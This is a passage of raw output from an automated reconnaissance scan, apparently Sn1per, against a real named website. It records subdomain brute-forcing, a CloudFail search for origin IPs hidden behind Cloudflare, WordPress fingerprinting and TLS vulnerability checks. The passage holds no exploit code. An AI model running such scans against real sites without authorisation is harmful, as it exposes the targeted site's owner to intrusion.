  1602. |_[ + ] Exploit:: 
  1603. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1604. |_[ + ] More details:: 
  1605. |_[ + ] Found:: UNIDENTIFIED
  1606. 
  1607.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1608. |_[ + ] [ 95 / 100 ]-[23:54:07] [ - ] 
  1609. |_[ + ] Target:: [ https://www.illuminatiofficial.org/amethyst-r-illuminatiam-featured/ ]
  1610. |_[ + ] Exploit:: 
  1611. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1612. |_[ + ] More details:: 
  1613. |_[ + ] Found:: UNIDENTIFIED
  1614. 
  1615.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1616. |_[ + ] [ 96 / 100 ]-[23:54:07] [ - ] 
  1617. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminati-official-page-header/ ]
  1618. |_[ + ] Exploit:: 
  1619. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1620. |_[ + ] More details:: 
  1621. |_[ + ] Found:: UNIDENTIFIED
  1622. 
  1623.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1624. |_[ + ] [ 97 / 100 ]-[23:54:08] [ - ] 
  1625. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminati-mark-eye-2/ ]
  1626. |_[ + ] Exploit:: 
  1627. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1628. |_[ + ] More details:: 
  1629. |_[ + ] Found:: UNIDENTIFIED
  1630. 
  1631.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1632. |_[ + ] [ 98 / 100 ]-[23:54:08] [ - ] 
  1633. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminati-simple-background-2/ ]
  1634. |_[ + ] Exploit:: 
  1635. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1636. |_[ + ] More details:: 
  1637. |_[ + ] Found:: UNIDENTIFIED
  1638. 
  1639.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1640. |_[ + ] [ 99 / 100 ]-[23:54:08] [ - ] 
  1641. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminatiam-site-popup-image/ ]
  1642. |_[ + ] Exploit:: 
  1643. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1644. |_[ + ] More details:: 
  1645. |_[ + ] Found:: UNIDENTIFIED
  1646.  
  1647. [ INFO ] [ Shutting down ]
  1648. [ INFO ] [ End of process INURLBR at [04-01-2018 23:54:08]
  1649. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1650. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-illuminatiofficial.org.txt ]
  1651. |_________________________________________________________________________________________
  1652.  
  1653. \_________________________________________________________________________________________/
  1654.  
  1655.  + -- --=[Port 110 closed... skipping.
  1656.  + -- --=[Port 111 closed... skipping.
  1657.  + -- --=[Port 135 closed... skipping.
  1658.  + -- --=[Port 139 closed... skipping.
  1659.  + -- --=[Port 161 closed... skipping.
  1660.  + -- --=[Port 162 closed... skipping.
  1661.  + -- --=[Port 389 closed... skipping.
  1662.  + -- --=[Port 443 opened... running tests...
  1663.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1664.  
  1665. ^ ^
  1666. _ __ _ ____ _ __ _ _ ____
  1667. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1668. | V V // o // _/ | V V // 0 // 0 // _/
  1669. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1670. <
  1671. ...'
  1672.  
  1673. WAFW00F - Web Application Firewall Detection Tool
  1674.  
  1675. By Sandro Gauci && Wendel G. Henrique
  1676.  
  1677. Checking https://illuminatiofficial.org
  1678. The site https://illuminatiofficial.org is behind a CloudFlare
  1679. Number of requests: 1
  1680.  
  1681.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  1682. ____ _ _ _____ _ _
  1683. / ___| | ___ _ _ __| | ___|_ _(_) |
  1684. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  1685. | |___| | (_) | |_| | (_| | _| (_| | | |
  1686. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  1687. v1.0.1 by m0rtem
  1688.  
  1689.  
  1690. [23:54:13] Initializing CloudFail - the date is: 04/01/2018
  1691. [23:54:13] Fetching initial information from: illuminatiofficial.org...
  1692. [23:54:13] Server IP: 104.24.30.26
  1693. [23:54:13] Testing if illuminatiofficial.org is on the Cloudflare network...
  1694. [23:54:13] illuminatiofficial.org is part of the Cloudflare network!
  1695. [23:54:13] Testing for misconfigured DNS using dnsdumpster...
  1696. [23:54:15] [FOUND:MX] 184.106.54.1 AS19994 Rackspace Ltd. 10 mx1.emailsrvr.com.
  1697. [23:54:15] [FOUND:MX] 173.203.2.32 AS19994 Rackspace Ltd. 20 mx2.emailsrvr.com.
  1698. [23:54:15] Scanning crimeflare database...
  1699. [23:54:17] [FOUND:IP] 166.62.53.198
  1700. [23:54:17] Scanning 2897 subdomains (subdomains.txt), please wait...
  1701. [23:54:17] 0.97% complete
  1702. [23:54:19] 1.93% complete
  1703. [23:54:20] 2.9% complete
  1704. [23:54:21] 3.87% complete
  1705. [23:54:33] 4.83% complete
  1706. [23:54:34] 5.8% complete
  1707. [23:54:35] [FOUND:SUBDOMAIN] autodiscover.illuminatiofficial.org ON CLOUDFLARE NETWORK!
  1708. [23:54:36] 6.77% complete
  1709. [23:54:37] 7.73% complete
  1710. [23:54:38] 8.7% complete
  1711. [23:54:39] 9.67% complete
  1712. [23:54:40] 10.63% complete
  1713. [23:54:42] 11.6% complete
  1714. [23:54:43] 12.56% complete
  1715. [23:54:44] 13.53% complete
  1716. [23:54:45] 14.5% complete
  1717. [23:54:46] 15.46% complete
  1718. [23:54:47] 16.43% complete
  1719. [23:54:48] 17.4% complete
  1720. [23:54:49] 18.36% complete
  1721. [23:54:51] 19.33% complete
  1722. [23:54:52] 20.3% complete
  1723. [23:54:53] 21.26% complete
  1724. [23:54:54] 22.23% complete
  1725. [23:54:55] 23.2% complete
  1726. [23:54:56] 24.16% complete
  1727. [23:54:57] 25.13% complete
  1728. [23:55:02] [FOUND:SUBDOMAIN] e.illuminatiofficial.org IP: 72.167.218.55 HTTP: 200
  1729. [23:55:03] 26.1% complete
  1730. [23:55:07] [FOUND:SUBDOMAIN] email.illuminatiofficial.org IP: 72.167.218.173 HTTP: 200
  1731. [23:55:08] 27.06% complete
  1732. [23:55:09] 28.03% complete
  1733. [23:55:10] 29.0% complete
  1734. [23:55:11] 29.96% complete
  1735. [23:55:15] 30.93% complete
  1736. [23:55:16] 31.9% complete
  1737. [23:55:18] 32.86% complete
  1738. [23:55:20] 33.83% complete
  1739. [23:55:21] 34.79% complete
  1740. [23:55:22] 35.76% complete
  1741. [00:28:09] 36.73% complete
  1742. [00:28:11] 37.69% complete
  1743. [00:28:12] 38.66% complete
  1744. [00:28:13] 39.63% complete
  1745. [00:28:14] 40.59% complete
  1746. [00:28:16] 41.56% complete
  1747. [00:28:17] 42.53% complete
  1748. [00:28:18] 43.49% complete
  1749. [00:28:19] 44.46% complete
  1750. [00:48:06] 45.43% complete
  1751. [00:48:07] 46.39% complete
  1752. [00:48:08] 47.36% complete
  1753. [00:48:09] 48.33% complete
  1754. [00:48:10] 49.29% complete
  1755. [00:48:11] 50.26% complete
  1756. [00:48:12] 51.23% complete
  1757. [00:48:13] 52.19% complete
  1758. [00:48:14] 53.16% complete
  1759. [00:48:15] 54.12% complete
  1760. [00:48:16] 55.09% complete
  1761. [00:48:17] 56.06% complete
  1762. [00:48:18] 57.02% complete
  1763. [00:48:20] 57.99% complete
  1764. [00:48:21] 58.96% complete
  1765. [00:49:02] [FOUND:SUBDOMAIN] pda.illuminatiofficial.org IP: 173.201.193.5 HTTP: 200
  1766. [00:49:03] 59.92% complete
  1767. [01:08:44] 60.89% complete
  1768. [01:08:46] 61.86% complete
  1769. [01:08:47] 62.82% complete
  1770. [01:08:49] 63.79% complete
  1771. [01:08:50] 64.76% complete
  1772. [01:08:51] 65.72% complete
  1773. [01:08:52] 66.69% complete
  1774. [01:08:53] 67.66% complete
  1775. [01:08:55] 68.62% complete
  1776. [01:08:56] 69.59% complete
  1777. [01:08:57] 70.56% complete
  1778. [01:08:58] 71.52% complete
  1779. [01:09:00] 72.49% complete
  1780. [01:09:01] 73.46% complete
  1781. [01:09:02] 74.42% complete
  1782. [01:09:04] 75.39% complete
  1783. [01:09:05] 76.35% complete
  1784. [01:09:06] 77.32% complete
  1785. [01:09:08] 78.29% complete
  1786. [01:15:41] 79.25% complete
  1787. [01:15:42] 80.22% complete
  1788. [01:15:43] 81.19% complete
  1789. [01:15:44] 82.15% complete
  1790. [01:15:45] 83.12% complete
  1791. [01:15:47] 84.09% complete
  1792. [01:15:48] 85.05% complete
  1793. [01:15:49] 86.02% complete
  1794. [01:15:50] 86.99% complete
  1795. [01:15:51] 87.95% complete
  1796. [01:15:52] 88.92% complete
  1797. [01:15:53] 89.89% complete
  1798. [01:15:55] 90.85% complete
  1799. [01:15:56] 91.82% complete
  1800. [01:16:00] [FOUND:SUBDOMAIN] webmail.illuminatiofficial.org IP: 173.201.193.133 HTTP: 200
  1801. [01:16:01] 92.79% complete
  1802. [01:16:02] 93.75% complete
  1803. [01:16:03] 94.72% complete
  1804. [01:16:04] [FOUND:SUBDOMAIN] www.illuminatiofficial.org ON CLOUDFLARE NETWORK!
  1805. [01:16:04] 95.69% complete
  1806. [01:16:06] 96.65% complete
  1807. [01:16:07] 97.62% complete
  1808. [01:16:09] 98.58% complete
  1809. [01:16:10] 99.55% complete
  1810. [01:16:11] Scanning finished...
  1811.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1812. https://illuminatiofficial.org [301 Moved Permanently] CloudFlare, Cookies[PHPSESSID,__cfduid], Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.24.31.26], RedirectLocation[https://www.illuminatiofficial.org/], UncommonHeaders[x-kinsta-cache,x-content-type-options,cf-ray], X-Powered-By[HHVM/3.23.2]
  1813. https://www.illuminatiofficial.org/ [200 OK] CloudFlare, Cookies[PHPSESSID,__cfduid], Country[UNITED STATES][US], Frame, Google-Analytics[Universal][UA-44625461-1,UA-93058433-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.24.31.26], JQuery[1.12.4], MetaGenerator[MasterSlider 3.0.4 - Responsive Touch Image Slider,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 4.7.8,jupiter 5.0.9], Open-Graph-Protocol[article], PoweredBy[Visual], Script[application/ld+json,text/javascript], Title[Illuminati Official Website - IlluminatiOfficial.org | Contact or Join], UncommonHeaders[link,x-kinsta-cache,x-content-type-options,cf-ray], WordPress[4.7.8], X-Powered-By[HHVM/3.23.2], X-UA-Compatible[IE=edge], YouTube
  1814.  
  1815.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  1816.  
  1817.  
  1818.  
  1819. AVAILABLE PLUGINS
  1820. -----------------
  1821.  
  1822. PluginHSTS
  1823. PluginHeartbleed
  1824. PluginSessionRenegotiation
  1825. PluginChromeSha1Deprecation
  1826. PluginCompression
  1827. PluginSessionResumption
  1828. PluginCertInfo
  1829. PluginOpenSSLCipherSuites
  1830.  
  1831.  
  1832.  
  1833. CHECKING HOST(S) AVAILABILITY
  1834. -----------------------------
  1835.  
  1836. illuminatiofficial.org => WARNING: Could not resolve hostname; discarding corresponding tasks.
  1837.  
  1838.  
  1839.  
  1840. SCAN COMPLETED IN 5.44 S
  1841. ------------------------
  1842. Version: 1.11.10-static
  1843. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1844. 
  1845. Testing SSL server illuminatiofficial.org on port 443 using SNI name illuminatiofficial.org
  1846.  
  1847. TLS Fallback SCSV:
  1848. Server does not support TLS Fallback SCSV
  1849.  
  1850. TLS renegotiation:
  1851. Secure session renegotiation supported
  1852.  
  1853. TLS Compression:
  1854. Compression disabled
  1855.  
  1856. Heartbleed:
  1857. TLS 1.2 not vulnerable to heartbleed
  1858. TLS 1.1 not vulnerable to heartbleed
  1859. TLS 1.0 not vulnerable to heartbleed
  1860.  
  1861. Supported Server Cipher(s):
  1862. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  1863. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1864. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  1865. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
  1866. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1867. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  1868. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
  1869. Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305  Curve P-256 DHE 256
  1870. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  1871. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1872. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1873. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1874. Accepted TLSv1.2 128 bits AES128-SHA
  1875. Accepted TLSv1.2 128 bits AES128-SHA256
  1876. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  1877. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1878. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1879. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1880. Accepted TLSv1.2 256 bits AES256-SHA
  1881. Accepted TLSv1.2 256 bits AES256-SHA256
  1882. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1883. Accepted TLSv1.1 128 bits AES128-SHA
  1884. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1885. Accepted TLSv1.1 256 bits AES256-SHA
  1886. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1887. Accepted TLSv1.0 128 bits AES128-SHA
  1888. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1889. Accepted TLSv1.0 256 bits AES256-SHA
  1890. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
  1891.  
  1892. SSL Certificate:
  1893. Signature Algorithm: ecdsa-with-SHA256
  1894. Subject: ssl387740.cloudflaressl.com
  1895. Altnames: DNS:ssl387740.cloudflaressl.com, DNS:*.cdn2u.com, DNS:*.dynamo-cycling.com, DNS:*.illuminati.am, DNS:*.illuminati.mp, DNS:*.illuminatiofficial.org, DNS:*.invitebyvoice.com, DNS:*.ipay.com.bd, DNS:*.offensivegreetingcards.com, DNS:*.pommadedivine.com, DNS:*.priyo.com, DNS:*.rateareporter.com, DNS:*.take2.co, DNS:*.tero.com, DNS:*.tinanz.com, DNS:*.vandenboss.com, DNS:cdn2u.com, DNS:dynamo-cycling.com, DNS:illuminati.am, DNS:illuminati.mp, DNS:illuminatiofficial.org, DNS:invitebyvoice.com, DNS:ipay.com.bd, DNS:offensivegreetingcards.com, DNS:pommadedivine.com, DNS:priyo.com, DNS:rateareporter.com, DNS:take2.co, DNS:tero.com, DNS:tinanz.com, DNS:vandenboss.com
  1896. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  1897.  
  1898. Not valid before: Dec 29 00:00:00 2017 GMT
  1899. Not valid after: Jul 7 23:59:59 2018 GMT
  1900. 
  1901. ###########################################################
  1902. testssl 2.9dev from https://testssl.sh/dev/
  1903. 
  1904. This program is free software. Distribution and
  1905. modification under GPLv2 permitted.
  1906. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  1907.  
  1908. Please file bugs @ https://testssl.sh/bugs/
  1909. 
  1910. ###########################################################
  1911.  
  1912. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  1913. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  1914. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  1915.  
  1916.  
  1917. Testing all IPv4 addresses (port 443): 104.24.31.26 104.24.30.26
  1918. -----------------------------------------------------
  1919.  Start 2018-01-05 01:16:28 -->> 104.24.31.26:443 (illuminatiofficial.org) <<--
  1920.  
  1921. further IP addresses: 104.24.30.26 2400:cb00:2048:1::6818:1f1a
  1922. 2400:cb00:2048:1::6818:1e1a
  1923. rDNS (104.24.31.26): --
  1924. Service detected: HTTP
  1925.  
  1926.  
  1927.  Testing protocols via sockets except SPDY+HTTP2 
  1928.  
  1929.  SSLv2 not offered (OK)
  1930.  SSLv3 not offered (OK)
  1931.  TLS 1 offered
  1932.  TLS 1.1 offered
  1933.  TLS 1.2 offered (OK)
  1934.  TLS 1.3 offered (OK): draft 18
  1935.  SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  1936.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  1937.  
  1938.  Testing ~standard cipher categories 
  1939.  
  1940.  NULL ciphers (no encryption) not offered (OK)
  1941.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  1942.  Export ciphers (w/o ADH+NULL) not offered (OK)
  1943.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  1944.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  1945.  Triple DES Ciphers (Medium) offered
  1946.  High encryption (AES+Camellia, no AEAD) offered (OK)
  1947.  Strong encryption (AEAD ciphers) offered (OK)
  1948.  
  1949.  
  1950.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  1951.  
  1952.  PFS is offered (OK) TLS13-AES-256-GCM-SHA384
  1953. TLS13-CHACHA20-POLY1305-SHA256
  1954. ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  1955. ECDHE-RSA-CHACHA20-POLY1305-OLD
  1956. ECDHE-RSA-AES256-GCM-SHA384
  1957. ECDHE-ECDSA-AES256-GCM-SHA384
  1958. ECDHE-RSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA384
  1959. ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA
  1960. ECDHE-ECDSA-CHACHA20-POLY1305
  1961. ECDHE-RSA-CHACHA20-POLY1305
  1962. TLS13-AES-128-GCM-SHA256
  1963. ECDHE-RSA-AES128-GCM-SHA256
  1964. ECDHE-ECDSA-AES128-GCM-SHA256
  1965. ECDHE-RSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA256
  1966. ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA
  1967.  Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  1968.  
  1969.  
  1970.  Testing server preferences 
  1971.  
  1972.  Has server cipher order? yes (OK)
  1973.  Negotiated protocol TLSv1.3
  1974.  Negotiated cipher TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  1975.  Cipher order
  1976. TLSv1: ECDHE-RSA-AES128-SHA AES128-SHA ECDHE-RSA-AES256-SHA AES256-SHA
  1977. DES-CBC3-SHA
  1978. TLSv1.1: ECDHE-RSA-AES128-SHA AES128-SHA ECDHE-RSA-AES256-SHA AES256-SHA
  1979. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  1980. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  1981. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  1982. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  1983. ECDHE-RSA-CHACHA20-POLY1305-OLD ECDHE-RSA-CHACHA20-POLY1305
  1984. ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA
  1985. ECDHE-RSA-AES128-SHA256 AES128-GCM-SHA256 AES128-SHA
  1986. AES128-SHA256 ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA
  1987. ECDHE-RSA-AES256-SHA384 AES256-GCM-SHA384 AES256-SHA
  1988. AES256-SHA256
  1989. TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  1990. TLS13-AES-128-GCM-SHA256
  1991.  
  1992.  
  1993.  Testing server defaults (Server Hello) 
  1994.  
  1995.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  1996. "session ticket/#35" "status request/#5"
  1997. "next protocol/#13172" "EC point formats/#11"
  1998. "extended master secret/#23"
  1999. "signed certificate timestamps/#18"
  2000. "application layer protocol negotiation/#16"
  2001.  Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  2002.  SSL Session ID support yes
  2003.  Session Resumption Tickets: yes, ID: yes
  2004.  TLS clock skew -1 sec from localtime
  2005.  
  2006. Server Certificate #1
  2007.  Signature Algorithm SHA256 with RSA
  2008.  Server key size RSA 2048 bits
  2009.  Fingerprint / Serial SHA1 0DBF827A6A853A276163B1E4C6938FED1B8A4E7A / C5D660AB733EBE7B799B3EEBD9B6BE69
  2010. SHA256 A2BF567B911769B5E0AAC0A97F1331FAB0F8E9B6AC58F2B545D0A10AEDBE0665
  2011.  Common Name (CN) ssl387739.cloudflaressl.com (CN in response to request w/o SNI: ssl387738.cloudflaressl.com)
  2012.  subjectAltName (SAN) ssl387739.cloudflaressl.com *.cdn2u.com
  2013. *.dynamo-cycling.com *.illuminati.am
  2014. *.illuminati.mp *.illuminatiofficial.org
  2015. *.invitebyvoice.com *.ipay.com.bd
  2016. *.offensivegreetingcards.com
  2017. *.pommadedivine.com *.priyo.com
  2018. *.rateareporter.com *.take2.co *.tero.com
  2019. *.tinanz.com *.vandenboss.com cdn2u.com
  2020. dynamo-cycling.com illuminati.am illuminati.mp
  2021. illuminatiofficial.org invitebyvoice.com
  2022. ipay.com.bd offensivegreetingcards.com
  2023. pommadedivine.com priyo.com rateareporter.com
  2024. take2.co tero.com tinanz.com vandenboss.com 
  2025.  Issuer COMODO RSA Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2026.  Trust (hostname) Ok via SAN (same w/o SNI)
  2027.  Chain of trust Ok 
  2028.  EV cert (experimental) no
  2029.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2030.  # of certificates provided 3
  2031.  Certificate Revocation List http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl
  2032.  OCSP URI http://ocsp.comodoca4.com
  2033.  OCSP stapling offered
  2034.  OCSP must staple no
  2035.  DNS CAA RR (experimental) not offered
  2036.  Certificate Transparency yes (TLS extension)
  2037.  
  2038. Server Certificate #2
  2039.  Signature Algorithm ECDSA with SHA256
  2040.  Server key size ECDSA 256 bits
  2041.  Fingerprint / Serial SHA1 9F701364405FB97D9195EFD69D69C27A104291BA / 41D7E47FC9F7F357CE3997FC8E17A90B
  2042. SHA256 2DE9F2E20301BD8DF38206D879A9E8377D838F1FE95C9F75FDFA05AEC6ADAD60
  2043.  Common Name (CN) ssl387740.cloudflaressl.com (CN in response to request w/o SNI: ssl387738.cloudflaressl.com)
  2044.  subjectAltName (SAN) ssl387740.cloudflaressl.com *.cdn2u.com
  2045. *.dynamo-cycling.com *.illuminati.am
  2046. *.illuminati.mp *.illuminatiofficial.org
  2047. *.invitebyvoice.com *.ipay.com.bd
  2048. *.offensivegreetingcards.com
  2049. *.pommadedivine.com *.priyo.com
  2050. *.rateareporter.com *.take2.co *.tero.com
  2051. *.tinanz.com *.vandenboss.com cdn2u.com
  2052. dynamo-cycling.com illuminati.am illuminati.mp
  2053. illuminatiofficial.org invitebyvoice.com
  2054. ipay.com.bd offensivegreetingcards.com
  2055. pommadedivine.com priyo.com rateareporter.com
  2056. take2.co tero.com tinanz.com vandenboss.com 
  2057.  Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2058.  Trust (hostname) Ok via SAN (same w/o SNI)
  2059.  Chain of trust Ok 
  2060.  EV cert (experimental) no
  2061.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2062.  # of certificates provided 3
  2063.  Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  2064.  OCSP URI http://ocsp.comodoca4.com
  2065.  OCSP stapling offered
  2066.  OCSP must staple no
  2067.  DNS CAA RR (experimental) not offered
  2068.  Certificate Transparency yes (TLS extension)
  2069.  
  2070. Server Certificate #3 (in response to request w/o SNI)
  2071.  Signature Algorithm SHA1 with RSA -- besides: users will receive a strong browser WARNING
  2072.  Server key size RSA 2048 bits
  2073.  Fingerprint / Serial SHA1 584B9525D5B6DF06A0930B8F110E1B6A92365B7B / D0C35F1955803E6CD53F0F31CAABA085
  2074. SHA256 C09585C561533855DCE3786C0A26DBAE301E4C11FF152E9EFEEEF48AF25C9B6D
  2075.  Common Name (CN) ssl387738.cloudflaressl.com
  2076.  subjectAltName (SAN) ssl387738.cloudflaressl.com *.cdn2u.com
  2077. *.dynamo-cycling.com *.illuminati.am
  2078. *.illuminati.mp *.illuminatiofficial.org
  2079. *.invitebyvoice.com *.ipay.com.bd
  2080. *.offensivegreetingcards.com
  2081. *.pommadedivine.com *.priyo.com
  2082. *.rateareporter.com *.take2.co *.tero.com
  2083. *.tinanz.com *.vandenboss.com cdn2u.com
  2084. dynamo-cycling.com illuminati.am illuminati.mp
  2085. illuminatiofficial.org invitebyvoice.com
  2086. ipay.com.bd offensivegreetingcards.com
  2087. pommadedivine.com priyo.com rateareporter.com
  2088. take2.co tero.com tinanz.com vandenboss.com 
  2089.  Issuer COMODO Domain Validation Legacy Server CA 2 (COMODO CA Limited from GB)
  2090.  Trust (hostname) Ok via SAN
  2091.  Chain of trust NOT ok: Linux (chain incomplete) Microsoft (chain incomplete) Mozilla (chain incomplete)
  2092. OK: Apple 
  2093.  EV cert (experimental) no
  2094.  Certificate Expiration 183 >= 60 days (2017-12-28 19:00 --> 2018-07-07 19:59 -0400)
  2095.  # of certificates provided 2
  2096.  Certificate Revocation List http://crl.comodoca4.com/COMODODomainValidationLegacyServerCA2.crl
  2097.  OCSP URI http://ocsp.comodoca4.com
  2098.  OCSP stapling offered
  2099.  OCSP must staple no
  2100.  DNS CAA RR (experimental) not offered
  2101.  Certificate Transparency yes (TLS extension)
  2102.  
  2103.  
  2104.  Testing HTTP header response @ "/" 
  2105.  
  2106.  HTTP Status Code  301 Moved Permanently, redirecting to "https://www.illuminatiofficial.org/"
  2107.  HTTP clock skew 0 sec from localtime
  2108.  Strict Transport Security --
  2109.  Public Key Pinning --
  2110.  Server banner cloudflare-nginx
  2111.  Application banner X-Powered-By(B: HHVM/3(B.2(B3(B.2(B
  2112.  Cookie(s) 2 issued: NONE secure, 1/2 HttpOnly -- maybe better try target URL of 30x
  2113.  Security headers X-Content-Type-Options nosniff
  2114.  Reverse Proxy banner --
  2115.  
  2116.  
  2117.  Testing vulnerabilities 
  2118.  
  2119.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  2120.  CCS (CVE-2014-0224) not vulnerable (OK)
  2121.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
  2122.  ROBOT not vulnerable (OK)
  2123.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  2124.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  2125.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  2126.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
  2127.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  2128.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  2129.  SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
  2130.  FREAK (CVE-2015-0204) not vulnerable (OK)
  2131.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  2132. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  2133. https://censys.io/ipv4?q=A2BF567B911769B5E0AAC0A97F1331FAB0F8E9B6AC58F2B545D0A10AEDBE0665 could help you to find out
  2134.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  2135.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  2136. AES128-SHA
  2137. ECDHE-RSA-AES256-SHA
  2138. AES256-SHA DES-CBC3-SHA 
